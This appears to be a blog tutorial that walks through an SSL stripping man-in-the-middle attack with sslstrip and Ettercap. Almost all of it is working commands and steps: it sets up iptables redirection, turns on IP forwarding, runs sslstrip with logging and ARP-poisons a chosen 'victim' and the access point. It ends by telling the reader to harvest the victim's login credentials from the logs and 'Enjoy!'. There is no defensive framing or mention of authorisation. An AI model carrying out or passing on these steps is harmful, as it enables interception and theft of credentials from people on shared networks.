Strip SSL via Ettercap Man in the Middle Attack-优快云博客

SSL Strip

This tool provides a demonstration of the HTTPS stripping attacks that was presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

In this article i will walk you through installing SSLstrip along with ettercap and perform a MITM attack.

1) Download Ettercap with GTK

sudo apt-get install ettercap ettercap-gtk

2) Download sslstrip

wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

3) Extract sslstrip

tar zxvf sslstrip-0.7.tar.gz

4) Redirect requests on port 80 (HTTP) to sslstrip running on port 10000

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

5) Verify the entry in nat table

sudo iptables --list -t nat

6) Enable forwarding

sudo echo "1" > /proc/sys/net/ipv4/ip_forward

7) Check forwarding

sudo cat /proc/sys/net/ipv4/ip_forward

You should get 1 as a reply

8) Run sslstrip logging on port 10000

sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000

9) Monitor the log

sudo tail -F sslstrip.log

10) Launch ettercap GUI with packet dump

sudo ettercap -G -w ~/ettercap_packets.pcap

11) Enter Unified sniffing

Sniff -> Unified sniffing

12) Select your wireless interface (this may be different than mine, check yours via 'ifconfig')

Network interface: wlan0

13) Scan for hosts

Hosts -> Scan for hosts

14) View hosts list from scan

Hosts -> Host list

15) Select targets

Highlight the victim -> Add to Target 1

Highlight the access point -> Add to Target 2

16) View added targets

Targets -> Current Targets

17) Perform arp poisoning (MITM Attack) on targets

Mitm -> Arp poisoning

You can test the stripping of SSL by browsing to a SSL supported site. http://facebook.com is a good example.

After the victim logs in, you will see the output in your sslstrip.log. Don't forget to go back with Wireshark and see if you got anything good in your ettercap_packets.pcap log.

Enjoy!